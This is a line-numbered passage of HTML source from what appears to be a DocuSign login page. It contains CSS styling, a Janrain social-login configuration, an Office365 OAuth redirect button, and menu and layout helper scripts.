  1103.             min-width: 150px;
  1104.             -moz-border-radius: 0px 0px 2px 2px;
  1105.             -webkit-border-radius: 0px 0px 2px 2px;
  1106.             border-radius: 0px 0px 2px 2px;
  1107.             -moz-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  1108.             -webkit-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  1109.             box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  1110.             background-color: #fff;
  1111.             border: solid 1px #ccc;
  1112.             -moz-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  1113.             -webkit-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  1114.             box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  1115.         }
  1116.  
  1117.         .ActionsMenuClosed {
  1118.             display: block;
  1119.             left: 0px;
  1120.             top: 0px;
  1121.             z-index: 1000;
  1122.             cursor: pointer;
  1123.             min-width: 100px;
  1124.             border: solid 1px transparent;
  1125.         }
  1126.  
  1127.         .ActionsMenuClosedNoHover {
  1128.             display: block;
  1129.             left: 0px;
  1130.             top: 0px;
  1131.             z-index: 1000;
  1132.             cursor: default;
  1133.             min-width: 100px;
  1134.             border: solid 1px transparent;
  1135.         }
  1136.  
  1137.         .ActionsMenuDisabled {
  1138.             color: #bbbbbb;
  1139.         }
  1140.  
  1141.         .ActionsMenuClosed:hover {
  1142.             display: block;
  1143.             left: 0px;
  1144.             top: 0px;
  1145.             z-index: 1000;
  1146.             cursor: pointer;
  1147.             min-width: 100px;
  1148.             background-color: #FAFAFA;
  1149.             border: solid 1px #A4A4A4;
  1150.             -moz-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  1151.             -webkit-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  1152.             box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  1153.             -moz-border-radius: 2px;
  1154.             -webkit-border-radius: 2px;
  1155.             border-radius: 2px;
  1156.         }
  1157.  
  1158.         .ActionMenuShowDown {
  1159.             left: 0px;
  1160.             top: 0px;
  1161.         }
  1162.  
  1163.         .ActionMenuShowDownNew {
  1164.             left: 0px;
  1165.             top: 0px;
  1166.             float: right;
  1167.             border: solid 1px transparent;
  1168.             background-color: #143169;
  1169.         }
  1170.  
  1171.         .ActionMenuShowUp {
  1172.             left: 0;
  1173.             bottom: 20px;
  1174.             position: absolute;
  1175.         }
  1176.  
  1177.         .ActionMenuItemTop {
  1178.             display: block;
  1179.             clear: both;
  1180.             padding-top: 5px;
  1181.             padding-left: 10px;
  1182.             white-space: nowrap;
  1183.             height: 24px;
  1184.             -moz-border-radius: 2px 2px 0px 0px;
  1185.             -webkit-border-radius: 2px 2px 0px 0px;
  1186.             border-radius: 2px 2px 0px 0px;
  1187.         }
  1188.  
  1189.         .ActionMenuItemTopSmall {
  1190.             display: block;
  1191.             clear: both;
  1192.             white-space: nowrap;
  1193.             height: 5px;
  1194.             -moz-border-radius: 2px 2px 0px 0px;
  1195.             -webkit-border-radius: 2px 2px 0px 0px;
  1196.             border-radius: 2px 2px 0px 0px;
  1197.         }
  1198.  
  1199.         .ActionMenuItemBottom {
  1200.             display: block;
  1201.             clear: both;
  1202.             border-top: solid 0px #999999;
  1203.             padding-top: 0px;
  1204.             padding-right: 0px;
  1205.             padding-left: 0px;
  1206.             white-space: nowrap;
  1207.             height: 5px;
  1208.             -moz-border-radius: 0px 0px 2px 2px;
  1209.             -webkit-border-radius: 0px 0px 2px 2px;
  1210.             border-radius: 0px 0px 2px 2px;
  1211.         }
  1212.  
  1213.         .ActionMenuItem {
  1214.             display: block;
  1215.             clear: both;
  1216.             padding-top: 6px;
  1217.             padding-bottom: 6px;
  1218.             padding-right: 10px;
  1219.             padding-left: 10px;
  1220.             white-space: nowrap;
  1221.         }
  1222.  
  1223.         .ActionMenuItemHover,
  1224.         .ActionMenuItem:hover {
  1225.             display: block;
  1226.             clear: both;
  1227.             padding-top: 6px;
  1228.             padding-bottom: 6px;
  1229.             padding-right: 10px;
  1230.             padding-left: 10px;
  1231.             white-space: nowrap;
  1232.             background-color: #e4e4e4;
  1233.         }
  1234.  
  1235.         .ActionMenuFltLeft {
  1236.             position: relative;
  1237.             float: left;
  1238.             margin: 5px 0px 5px 0px;
  1239.             vertical-align: top;
  1240.         }
  1241.  
  1242.         .ActionMenuFltLeftSpace {
  1243.             height: 1px;
  1244.             font-size: 1px;
  1245.             z-index: 19;
  1246.         }
  1247.  
  1248.         .ActionMenuItemFltTop {
  1249.             position: relative;
  1250.             padding: 2px;
  1251.             padding-left: 5px;
  1252.             white-space: nowrap;
  1253.             -webkit-border-radius: 5px 5px 0px 0px;
  1254.             -moz-border-radius: 5px 5px 0px 0px;
  1255.             border-radius: 5px 5px 0px 0px;
  1256.         }
  1257.  
  1258.         .ActionMenuItemImg {
  1259.             position: relative;
  1260.             vertical-align: middle;
  1261.             margin: 0px 5px 0px 5px;
  1262.             border: none;
  1263.         }
  1264.  
  1265.         .TightMenuItem {
  1266.             display: block;
  1267.             clear: both;
  1268.             padding: 0px 0px 0px 0px;
  1269.             white-space: nowrap;
  1270.             height: 24px;
  1271.         }
  1272.  
  1273.         .AccountMenuNew {
  1274.             background-color: #fff;
  1275.             border: solid 1px #ccc;
  1276.             background-color: #FFFFFF;
  1277.             position: absolute;
  1278.             right: 10px;
  1279.             top: 50px;
  1280.             -moz-border-radius: 2px;
  1281.             -webkit-border-radius: 2px;
  1282.             border-radius: 2px;
  1283.             -moz-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  1284.             -webkit-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  1285.             box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  1286.         }
  1287.  
  1288.         #ds_divUserAccountsMenuNew:hover {
  1289.             border: solid 1px transparent;
  1290.             background-color: #143169;
  1291.         }
  1292.  
  1293.         .AccountOpenMenuNew {
  1294.             padding-left: 10px;
  1295.             padding-right: 10px;
  1296.             white-space: nowrap;
  1297.             width: 80px;
  1298.             min-width: 80px;
  1299.             height: 40px;
  1300.             padding-top: 5px;
  1301.             border-left: solid 1px #143169;
  1302.             border-right: solid 1px #143169;
  1303.         }
  1304.  
  1305.         .AccountSelected {
  1306.             height: 29px;
  1307.             text-align: right;
  1308.             padding-top: 9px;
  1309.             margin-right: 20px;
  1310.             float: left;
  1311.             font-size: 11px;
  1312.             color: #FFFFFF;
  1313.         }
  1314.  
  1315.         .UpdateAccount {
  1316.             float: left;
  1317.             margin-right: 10px;
  1318.             padding-top: 9px;
  1319.             font-size: 11px;
  1320.             color: #FFFFFF;
  1321.         }
  1322.  
  1323.  
  1324.         .RowHeaderCell {
  1325.             border-right: solid 1px transparent;
  1326.             border-left: solid 1px transparent;
  1327.             border-bottom: solid 1px #ccc;
  1328.             background-color: #fff;
  1329.             height: 23px;
  1330.             vertical-align: middle;
  1331.             border-top: none;
  1332.             white-space: nowrap;
  1333.             padding-left: 4px;
  1334.             padding-right: 4px;
  1335.             cursor: pointer;
  1336.         }
  1337.  
  1338.         .RowHeaderCell:hover {
  1339.             text-decoration: underline;
  1340.         }
  1341.  
  1342.         .RowHeaderCellNoClick {
  1343.             border-right: solid 1px transparent;
  1344.             border-left: solid 1px transparent;
  1345.             border-bottom: solid 1px #ccc;
  1346.             background-color: #fff;
  1347.             height: 23px;
  1348.             vertical-align: middle;
  1349.             border-top: none;
  1350.             white-space: nowrap;
  1351.             padding-left: 4px;
  1352.             padding-right: 4px;
  1353.         }
  1354.  
  1355.         .RowHeaderSectionBorder {
  1356.             border-right: solid 1px #FFFFFF;
  1357.             border-left: solid 1px #FFFFFF;
  1358.             border-top: solid 1px #DFDFDF;
  1359.             border-bottom: solid 1px #DFDFDF;
  1360.         }
  1361.  
  1362.         .RowHeaderSorted {
  1363.             background-image: url(img/row_col_sorted.png) !important;
  1364.             background-position: bottom !important;
  1365.         }
  1366.  
  1367.         .RowHeaderCellAlignCenter {
  1368.             text-align: center;
  1369.         }
  1370.  
  1371.         .RowHeaderCellLeft {
  1372.             border-left: solid 0px #CCCCCC;
  1373.         }
  1374.  
  1375.         .RowHeaderCellRight {
  1376.             border-right: solid 0px #CCCCCC;
  1377.         }
  1378.  
  1379.         .RowHeaderLink,
  1380.         .RowHeaderLink:hover,
  1381.         .RowHeaderLink:visited {
  1382.             color: #0073cf;
  1383.             text-decoration: none;
  1384.             cursor: pointer;
  1385.         }
  1386.  
  1387.         .RowHeaderLinkDisabled {
  1388.             color: #dedede;
  1389.             text-decoration: none;
  1390.             cursor: default;
  1391.         }
  1392.  
  1393.         .RowNoHover {
  1394.             border-left: solid 0px #cccccc;
  1395.             border-right: solid 0px #cccccc;
  1396.             border-top: solid 1px #cccccc;
  1397.             border-bottom: solid 1px #cccccc;
  1398.             background-color: #ffffff;
  1399.             height: 25px;
  1400.             cursor: default;
  1401.         }
  1402.  
  1403.         .RowAltNoHover {
  1404.             border-left: solid 0px #cccccc;
  1405.             border-right: solid 0px #cccccc;
  1406.             border-top: solid 1px #cccccc;
  1407.             border-bottom: solid 1px #cccccc;
  1408.             background-color: #ffffff;
  1409.             height: 25px;
  1410.             cursor: default;
  1411.         }
  1412.  
  1413.         .RowCellSubHead {
  1414.             border-left: solid 0px #cccccc;
  1415.             border-right: solid 0px #cccccc;
  1416.             border-top: solid 2px #cccccc;
  1417.             border-bottom: solid 1px #cccccc;
  1418.             padding: 3px 4px;
  1419.         }
  1420.  
  1421.         .Row {
  1422.             border-left: solid 0px #cccccc;
  1423.             border-right: solid 0px #cccccc;
  1424.             border-top: solid 1px #cccccc;
  1425.             border-bottom: solid 1px #cccccc;
  1426.             cursor: pointer;
  1427.         }
  1428.  
  1429.         .RowAlt {
  1430.             border-left: solid 0px #cccccc;
  1431.             border-right: solid 0px #cccccc;
  1432.             border-top: solid 1px #cccccc;
  1433.             border-bottom: solid 1px #cccccc;
  1434.             cursor: pointer;
  1435.         }
  1436.  
  1437.         .Row:hover,
  1438.         .RowAlt:hover {
  1439.             background-color: #f4f4f4;
  1440.         }
  1441.  
  1442.         .RowSel,
  1443.         .RowAltSel {
  1444.             border-left: solid 0px #cccccc;
  1445.             border-right: solid 0px #cccccc;
  1446.             border-top: solid 1px #cccccc;
  1447.             border-bottom: solid 1px #cccccc;
  1448.             background-color: #e4e4e4;
  1449.             cursor: pointer;
  1450.         }
  1451.  
  1452.         .RowCell {
  1453.             border-left: none;
  1454.             border-right: solid 1px transparent;
  1455.             border-top: solid 1px #cccccc;
  1456.             border-bottom: solid 1px #cccccc;
  1457.             padding: 3px 0px 3px 4px;
  1458.         }
  1459.  
  1460.         .RowBulkCell {
  1461.             border-left: none;
  1462.             border-right: none;
  1463.             border-bottom: solid 1px #cccccc;
  1464.             vertical-align: top;
  1465.             padding: 3px 0px 3px 2px;
  1466.         }
  1467.  
  1468.         .RowCellRight {
  1469.             border-left: none;
  1470.             border-right: solid 0px transparent;
  1471.             border-top: solid 1px #cccccc;
  1472.             border-bottom: solid 1px #cccccc;
  1473.             padding: 3px 0px 3px 4px;
  1474.         }
  1475.  
  1476.         .RowNoHeight {
  1477.             border-left: solid 0px #cccccc;
  1478.             border-right: solid 0px #cccccc;
  1479.             border-top: solid 1px #cccccc;
  1480.             border-bottom: solid 1px #cccccc;
  1481.             background-color: #ffffff;
  1482.             cursor: pointer;
  1483.         }
  1484.  
  1485.         .RowAltNoHeight {
  1486.             border-left: solid 0px #cccccc;
  1487.             border-right: solid 0px #cccccc;
  1488.             border-top: solid 1px #cccccc;
  1489.             border-bottom: solid 1px #cccccc;
  1490.             background-color: #ffffff;
  1491.             cursor: pointer;
  1492.         }
  1493.  
  1494.         .RowNoHeight:hover,
  1495.         .RowAltNoHeight:hover {
  1496.             background-color: #f4f4f4;
  1497.         }
  1498.  
  1499.         .ColSorted {
  1500.             background-image: url(img/row_col_sorted.png) !important;
  1501.         }
  1502.  
  1503.         .TreeHeader {
  1504.             position: relative;
  1505.             white-space: nowrap;
  1506.             height: 25px;
  1507.             font-weight: normal;
  1508.             padding-left: 4px;
  1509.             padding-top: 0px;
  1510.             margin-bottom: 0px;
  1511.             border-top: solid 1px transparent;
  1512.         }
  1513.  
  1514.         .TreeHeaderText {
  1515.             position: absolute;
  1516.             top: 4px;
  1517.             left: 20px;
  1518.         }
  1519.  
  1520.         .TreeHeaderTextNotTop {
  1521.             position: absolute;
  1522.             top: 13px;
  1523.             left: 20px;
  1524.         }
  1525.  
  1526.         .TreeHeaderActive {
  1527.             height: 25px;
  1528.             background-image: none;
  1529.             font-weight: bold;
  1530.             border: solid 1px transparent;
  1531.         }
  1532.  
  1533.         .TreeHeaderActiveNotTop {
  1534.             margin-top: 10px;
  1535.             padding-top: 10px;
  1536.             border-top: solid 1px transparent;
  1537.         }
  1538.  
  1539.         .TreeHeaderSel {
  1540.             font-weight: bold;
  1541.             background-image: url(img/dialog_green_h_rotated.png);
  1542.         }
  1543.  
  1544.         .TreeNewItem {
  1545.             font-size: 11px;
  1546.             position: absolute;
  1547.             top: 4px;
  1548.             right: 10px;
  1549.             font-weight: normal;
  1550.         }
  1551.  
  1552.         .TreeNewItemNotTop {
  1553.             font-size: 11px;
  1554.             position: absolute;
  1555.             top: 13px;
  1556.             right: 10px;
  1557.             font-weight: normal;
  1558.         }
  1559.  
  1560.         .TreeNodeSel {
  1561.             -webkit-user-select: none;
  1562.             -khtml-user-select: none;
  1563.             -moz-user-select: none;
  1564.             -o-user-select: none;
  1565.             user-select: none;
  1566.             padding-top: 2px;
  1567.             padding-bottom: 2px;
  1568.             background-image: url(img/manage_selector.png);
  1569.             background-repeat: repeat-x;
  1570.         }
  1571.  
  1572.         .TreeNode {
  1573.             -webkit-user-select: none;
  1574.             -khtml-user-select: none;
  1575.             -moz-user-select: none;
  1576.             -o-user-select: none;
  1577.             user-select: none;
  1578.             padding-top: 2px;
  1579.             padding-bottom: 2px;
  1580.         }
  1581.  
  1582.         .TreeNode:Hover {
  1583.             -webkit-user-select: none;
  1584.             -khtml-user-select: none;
  1585.             -moz-user-select: none;
  1586.             -o-user-select: none;
  1587.             user-select: none;
  1588.             padding-top: 2px;
  1589.             padding-bottom: 2px;
  1590.             background-color: #f4f4f4;
  1591.         }
  1592.  
  1593.         .TreeNodeNoH {
  1594.             -webkit-user-select: none;
  1595.             -khtml-user-select: none;
  1596.             -moz-user-select: none;
  1597.             -o-user-select: none;
  1598.             user-select: none;
  1599.             padding-top: 2px;
  1600.             padding-bottom: 2px;
  1601.         }
  1602.     </style>
  1603.     <style id="ds_litStyle" type="text/css"></style>
  1604.     <script language="javascript" src="js/XmlHttp.js?vers=18.1.100.8594" type="text/javascript"></script>
  1605.     <script type="text/javascript" src="js/jquery-1.10.2.min.js"></script>
  1606.     <link type="text/css" rel="stylesheet" href="css/Framework.css?vers=18.1.100.8594" />
  1607.     <link type="text/css" rel="stylesheet" href="css/activate.css" />
  1608.     <style id="ds_hldrHTMLHead_litStyle" type="text/css"></style>
  1609.  
  1610.     <script type='text/javascript'>
  1611.         function AuthenticateO365(popup) {
  1612.             var idx = window.location.href.toLowerCase().indexOf('/member');
  1613.             if (idx > -1) {
  1614.                 var url = window.location.href.substr(0, idx);
  1615.                 var redirurl = url + '/member/redirect.aspx?extauth=office365&login=';
  1616.                 if (popup) redirurl += '0';
  1617.                 else redirurl += '1';
  1618.                 url += '/restapi/oauth2/externalauth/office365?redirect_uri=' + escape(redirurl) + '&client_id=DOCU-11110b8f-851d-400b-9ec2-641fd2372ac3&nocreate=1';
  1619.                 if (popup) window.open(url, 'office365auth', 'height=503,width=950');
  1620.                 else window.location.href = url;
  1621.             }
  1622.         }
  1623.  
  1624.         (function() {
  1625.             if (typeof window.janrain !== 'object') window.janrain = {};
  1626.             window.janrain.settings = {};
  1627.  
  1628.             /* _______________ can edit below this line _______________ */
  1629.  
  1630.             janrain.settings.tokenUrl = 'https://www.docusign.net/Member/JanrainProcessor.aspx?action=login';
  1631.             janrain.settings.type = 'embed';
  1632.             janrain.settings.appId = 'dhpfifnnpifbmnggpkia';
  1633.             janrain.settings.appUrl = 'https://login.docusign.net';
  1634.             janrain.settings.providers = ['live_id', 'googleplus', 'facebook', 'linkedin', 'salesforce', 'yahoo', 'twitter'];
  1635.             janrain.settings.providersPerPage = '8';
  1636.             janrain.settings.format = 'one column';
  1637.             janrain.settings.actionText = ' ';
  1638.             janrain.settings.showAttribution = false;
  1639.             janrain.settings.fontColor = '#333333';
  1640.             janrain.settings.fontFamily = 'Arial, helvetica, sans-serif';
  1641.             janrain.settings.backgroundColor = 'transparent';
  1642.             janrain.settings.width = '250';
  1643.             janrain.settings.borderColor = 'transparent';
  1644.             janrain.settings.borderRadius = '0';
  1645.             janrain.settings.buttonBorderColor = 'transparent';
  1646.             janrain.settings.buttonBorderRadius = '2';
  1647.             janrain.settings.buttonBackgroundStyle = 'gradient';
  1648.             janrain.settings.language = 'en';
  1649.             janrain.settings.linkClass = 'janrainEngage';
  1650.  
  1651.             /* _______________ can edit above this line _______________ */
  1652.  
  1653.             function isReady() {
  1654.                 janrain.ready = true;
  1655.             };
  1656.             if (document.addEventListener) {
  1657.                 document.addEventListener('DOMContentLoaded', isReady, false);
  1658.             } else {
  1659.                 window.attachEvent('onload', isReady);
  1660.             }
  1661.  
  1662.             var e = document.createElement('script');
  1663.             e.type = 'text/javascript';
  1664.             e.id = 'janrainAuthWidget';
  1665.  
  1666.             if (document.location.protocol === 'https:') {
  1667.                 e.src = 'https://rpxnow.com/js/lib/login.docusign.net/engage.js';
  1668.             } else {
  1669.                 e.src = 'http://widget-cdn.rpxnow.com/js/lib/login.docusign.net/engage.js';
  1670.             }
  1671.  
  1672.             var s = document.getElementsByTagName('script')[0];
  1673.             s.parentNode.insertBefore(e, s);
  1674.         })();
  1675.     </script>
  1676.  
  1677.  
  1678.     <style type="text/css">
  1679.         #office365:hover {
  1680.             background-image: none;
  1681.             background-color: #E3E3E3;
  1682.         }
  1683.  
  1684.         #office365 .janrain-provider-icon-24 {
  1685.             background-image: url("img/office365_small.png");
  1686.             background-repeat: no-repeat;
  1687.         }
  1688.  
  1689.         .janrainColumnContainer {
  1690.             height: 320px;
  1691.         }
  1692.  
  1693.         .FieldLabel {
  1694.             padding-right: 1em;
  1695.             padding-bottom: 0.5em;
  1696.         }
  1697.  
  1698.         .form-area {
  1699.             padding-bottom: 1em;
  1700.         }
  1701.  
  1702.         .form-area h1 {
  1703.             padding-bottom: 1em;
  1704.             text-align: center;
  1705.         }
  1706.  
  1707.         .janrainContent {
  1708.             margin-left: auto;
  1709.             margin-right: auto;
  1710.         }
  1711.        
  1712.         .logins a:hover {
  1713.             box-shadow: 2px 5px 10px #1b49a0;
  1714.         }
  1715.     </style>
  1716.     <script type="text/javascript">
  1717.         // Wire-up our Janrain override functionality.
  1718.         $(document).ready(function() {
  1719.             setTimeout(renderO365, 500);
  1720.  
  1721.             function renderO365() {
  1722.                 var twitterItem = $("#janrain-twitter");
  1723.                 var existingO365 = $("#office365");
  1724.  
  1725.                 if (twitterItem.length === 0) {
  1726.                     setTimeout(renderO365, 500);
  1727.                     return;
  1728.                 }
  1729.  
  1730.                 // Janrain is tricksy and re-renders when its popup windows are clicked, so we have to monitor for it and re-render when it re-renders.
  1731.                 // So we poll to make sure things are right.
  1732.                 if (existingO365.length !== 0) {
  1733.                     setTimeout(renderO365, 1000);
  1734.                     return;
  1735.                 }
  1736.  
  1737.                 // Have to use outerHTML to clone only the markup and not the attached events under IE8. Bleh - stupid attachEvent...
  1738.                 var o365 = $(twitterItem[0].outerHTML);
  1739.  
  1740.                 o365.attr("id", "office365");
  1741.                 o365.click(function() {
  1742.                     AuthenticateO365(false);
  1743.                 });
  1744.  
  1745.                 var backgroundImage = o365.css("background-image");
  1746.  
  1747.                 o365.mouseenter(function() {
  1748.                     o365.css("background-image", "");
  1749.                 }).mouseleave(function() {
  1750.                     o365.css("background-image", backgroundImage);
  1751.                 });
  1752.  
  1753.  
  1754.                 $(".janrain-provider-icon-24", o365)
  1755.                     .removeClass("janrain-provider-icon-twitter")
  1756.                     .attr("title", "office365")
  1757.                     .attr("alt", "office365");
  1758.  
  1759.                 $(".janrain-provider-text-color-twitter", o365)
  1760.                     .removeClass("janrain-provider-text-color-twitter")
  1761.                     .text("Office365");
  1762.  
  1763.                 twitterItem.parent().append(o365);
  1764.                 $(".janrainContent").css("height", "320px");
  1765.  
  1766.                 // We just rendered, so keep monitoring, but we can wait a little longer.
  1767.                 setTimeout(renderO365, 2000);
  1768.  
  1769.             }
  1770.  
  1771.         });
  1772.  
  1773.         // Wire-up the site list functionality.
  1774.         $(document).ready(function() {
  1775.  
  1776.             // When our site list selection changes, redirect the user to the selected site.
  1777.             var siteList = $("#ds_hldrBdy_SiteList");
  1778.             var uriPattern = /^http/i;
  1779.  
  1780.             siteList.change(function() {
  1781.  
  1782.                 // If the selected entry has a value (i.e. URI), redirect there.
  1783.                 var newSite = siteList.val();
  1784.                 if ((newSite !== undefined) && (newSite !== null) && (uriPattern.test(newSite))) {
  1785.                    window.location.assign(newSite);
  1786.                 }
  1787.             });
  1788.         });
  1789.     </script>
  1790.  
  1791.  
  1792.     <script language="javascript" type="text/javascript">
  1793.         var bdyId = "ds_hldrBdy_";
  1794.         var formbodyId = "ds_FormBody";
  1795.         var borderId = "ds_Border";
  1796.         var headertabsId = "ds_Tabs";
  1797.         var headerId = "ds_Header";
  1798.         var footerId = "ds_Footer";
  1799.         var tiId = "ds_ti";
  1800.         var headerContentId = "ds_hldrHC_";
  1801.         var hldrOutside = "ds_hldrOutside_";
  1802.         var masterIsMobile = "false";
  1803.         var masterIsSafari = "false";
  1804.         var leavemastermenuopen = false;
  1805.  
  1806.         function BtnCancelMD(btn) {
  1807.             if (btn && btn.onmousedown != null) btn.onmousedown = null;
  1808.         }
  1809.  
  1810.         function ChangeSelectedAccount(accountid, confirmMsg) {
  1811.             if (true) {
  1812.                 if (confirmMsg == "" || confirm(confirmMsg)) {
  1813.                     if (typeof(CancelAsynch) != "undefined") CancelAsynch();
  1814.                     document.getElementById("hdnSetSelectedAccount").value = accountid;
  1815.                     if (typeof(txtHtmlBlobEscape) != "undefined") txtHtmlBlobEscape();
  1816.                     document.forms[0].submit();
  1817.                 }
  1818.             }
  1819.         }
  1820.  
  1821.         function CE(e) {
  1822.             if (!e) e = window.event;
  1823.             if (e) {
  1824.                 if (e.cancelBubble != null) e.cancelBubble = true;
  1825.                 if (e.returnValue != null) e.returnValue = false;
  1826.                 if (e.preventDefault) e.preventDefault();
  1827.                 if (e.stopPropagation) e.stopPropagation();
  1828.             }
  1829.             return false;
  1830.         }
  1831.  
  1832.         function MasterPageAction(which) {
  1833.             if (true) {
  1834.                 if (typeof(CancelAsynch) != "undefined") CancelAsynch();
  1835.                 document.getElementById("ds_hdnMasterPageAction").value = which;
  1836.                 if (typeof(txtHtmlBlobEscape) != "undefined") txtHtmlBlobEscape();
  1837.                 document.forms[0].submit();
  1838.             }
  1839.         }
  1840.  
  1841.         function ChangeSite(site, accountId) {
  1842.             document.getElementById("hdnChangeSiteAccount").value = accountId;
  1843.             MasterPageAction(site);
  1844.         }
  1845.  
  1846.         function CloseMasterPageMenus() {
  1847.             if (leavemastermenuopen) {
  1848.                 leavemastermenuopen = false;
  1849.                 return;
  1850.             }
  1851.             ShowAccounts(true);
  1852.             var acttop = document.getElementById("ds_divUserAccountsMenu");
  1853.             if (acttop) acttop.className = "ActionsMenuClosed HeaderLink";
  1854.             var menu = document.getElementById("divAccountMenuItems");
  1855.             if (!menu) menu = document.getElementById("divAccountMenuItemsNew");
  1856.             if (menu) menu.style.display = "none";
  1857.             menu = document.getElementById("ds_divUserAccountsMenuNew");
  1858.             if (menu) menu.className = "ActionsMenuClosed";
  1859.             acttop = document.getElementById("ds_divLanguageMenu");
  1860.             if (acttop) acttop.className = "FooterMenuClosed";
  1861.             menu = document.getElementById("divLanguageMenuItems");
  1862.             if (menu) menu.style.display = "none";
  1863.             menu = document.getElementById("divSiteItems");
  1864.             if (menu) menu.style.display = "none";
  1865.             acttop = document.getElementById("ds_divHelpMenu");
  1866.             if (acttop) acttop.className = "FooterMenuClosed";
  1867.             var menu = document.getElementById("divHelpMenuItems");
  1868.             if (menu) menu.style.display = "none";
  1869.             acttop = document.getElementById("ds_divTermsMenu");
  1870.             if (acttop) acttop.className = "FooterMenuClosed";
  1871.             var menu = document.getElementById("divTermsMenuItems");
  1872.             if (menu) menu.style.display = "none";
  1873.             acttop = document.getElementById("ds_divIPMenu");
  1874.             if (acttop) acttop.className = "FooterMenuClosed";
  1875.             var menu = document.getElementById("divIPMenuItems");
  1876.             if (menu) menu.style.display = "none";
  1877.             if (typeof(LoadedSetDocMouseDown) != "undefined") LoadedSetDocMouseDown();
  1878.  
  1879.             var helpacttop = document.getElementById('divHelpMenu');
  1880.             if (helpacttop) acttop.className = 'ActionsMenuClosed';
  1881.             var helpmenu = document.getElementById('divHelpMenuItems');
  1882.             if (helpmenu) helpmenu.style.display = 'none';
  1883.         }
  1884.  
  1885.         function OpenMasterPageMenu(mi, outer, css) {
  1886.             if (document.getElementById(mi) && document.getElementById(mi).style.display == 'none') {
  1887.                var acttop = document.getElementById("ds_" + outer);
  1888.                 if (acttop) acttop.className = "ActionsMenu " + css;
  1889.  
  1890.                 /* get before display for positioning */
  1891.                 var startl = 0;
  1892.                 if (mi == "divLanguageMenuItems") {
  1893.                     var selitem = document.getElementById(bdyId + "divLanguageSelected");
  1894.                     if (selitem) {
  1895.                         startl = (selitem.offsetWidth / 2);
  1896.                     }
  1897.                 }
  1898.                 if (mi == "divTermsMenuItems") {
  1899.                     var selitem = document.getElementById("divTermsSelected");
  1900.                     if (selitem) {
  1901.                         startl = (selitem.offsetWidth / 2);
  1902.                     }
  1903.                 }
  1904.                 if (mi == "divIPMenuItems") {
  1905.                     var selitem = document.getElementById("divIPSelected");
  1906.                     if (selitem) {
  1907.                         startl = (selitem.offsetWidth / 2);
  1908.                     }
  1909.                 }
  1910.                 if (mi == "divHelpMenuItems") {
  1911.                     var selitem = document.getElementById("divHelpSelected");
  1912.                     if (selitem) {
  1913.                         startl = (selitem.offsetWidth / 2);
  1914.                     }
  1915.                 }
  1916.  
  1917.                 var midiv = document.getElementById(mi);
  1918.                 midiv.style.display = 'block';
  1919.                 if (masterIsMobile) document.ontouchend = CloseMasterPageMenus;
  1920.                 document.onmousedown = CloseMasterPageMenus;
  1921.                 if (mi == "divLanguageMenuItems" || "divHelpMenuItems" || "divTermsMenuItems" || "divIPMenuItems") {
  1922.                     var footer = document.getElementById(footerId);
  1923.                     var footerlinks = document.getElementById("divFooterLinks");
  1924.                     var bw = MasterPageBrowserWidth();
  1925.                     if (footer && footerlinks && bw > 0) {
  1926.                        var l = (masterIsSafari == "true") ? startl - (acttop.offsetWidth / 2) : 0 - startl - (acttop.offsetWidth / 2);
  1927.                         var scrleft = MasterPageScrollLeft();
  1928.                         if ((footerlinks.offsetLeft - scrleft) + l < 0) {
  1929.                            /* if left is off the screen put it at the left edge */
  1930.                            l -= l + (footerlinks.offsetLeft - scrleft);
  1931.                            acttop.style.left = l + "px";
  1932.                        } else {
  1933.                            var right = (footerlinks.offsetLeft + l + acttop.offsetWidth) - scrleft;
  1934.                            if (right > bw) {
  1935.                                 l -= (right - bw);
  1936.                                 /* if left is off the screen put it at the left edge */
  1937.                                 if ((footerlinks.offsetLeft - scrleft) + l < 0) {
  1938.                                    l += (right - bw);
  1939.                                    l -= l + (footerlinks.offsetLeft - scrleft);
  1940.                                }
  1941.                            }
  1942.                            acttop.style.left = (l) + "px";
  1943.                        }
  1944.                    }
  1945.                } else if (mi == "divHelpMenuItems" || "divTermsMenuItems" || "divIPMenuItems") acttop.style.left = 0 + "px";
  1946.            }
  1947.        }
  1948.  
  1949.        function ShowAccounts(hide) {
  1950.            var div = document.getElementById("divAccountMenuItems");
  1951.            if (!div) div = document.getElementById("divAccountMenuItemsNew");
  1952.            if (div) div = div.firstChild;
  1953.            while (div) {
  1954.                if (div.getAttribute && div.getAttribute("isaccount") == "1") {
  1955.                    div.style.display = hide ? "none" : "";
  1956.                }
  1957.                div = div.nextSibling;
  1958.            }
  1959.            if (!hide) leavemastermenuopen = true;
  1960.        }
  1961.  
  1962.        function LogoSizePage() {
  1963.            if (typeof(Size) == "function") Size();
  1964.            if (typeof(ResizeSqueezePage) == "function") {
  1965.                ResizeSqueezePage();
  1966.                ResizeSqueezePage(false, true);
  1967.            }
  1968.            if (typeof(SizeFrames) == "function") {
  1969.                if (typeof(BrowserDims) != "undefined" && typeof(gHPg) != "undefined") BrowserDims(gHPg);
  1970.                SizeFrames();
  1971.            }
  1972.            if (typeof(SizeWindowObjects) == "function") SizeWindowObjects();
  1973.            if (typeof(ResizeManageAccounts) == "function") ResizeManageAccounts();
  1974.            if (typeof(ResizePage) == "function") ResizePage();
  1975.            if (typeof(SizeContentHeight) == "function") SizeContentHeight();
  1976.            if (typeof(resize) == "function") resize();
  1977.        }
  1978.  
  1979.        function MasterPageBrowserWidth() {
  1980.            var bw = 0;
  1981.            if (typeof(window.innerWidth) != 'undefined') {
  1982.                bw = window.innerWidth;
  1983.            } else if (typeof(document.documentElement) != 'undefined' && document.documentElement.clientWidth) {
  1984.                bw = document.documentElement.clientWidth;
  1985.            } else if (typeof(document.documentElement) != 'undefined' && document.documentElement.offsetWidth) {
  1986.                bw = document.documentElement.offsetWidth;
  1987.            } else {
  1988.                var body = document.getElementsByTagName("body");
  1989.                if (body && body[0] &&
  1990.                    typeof(body[0]) != 'undefined') {
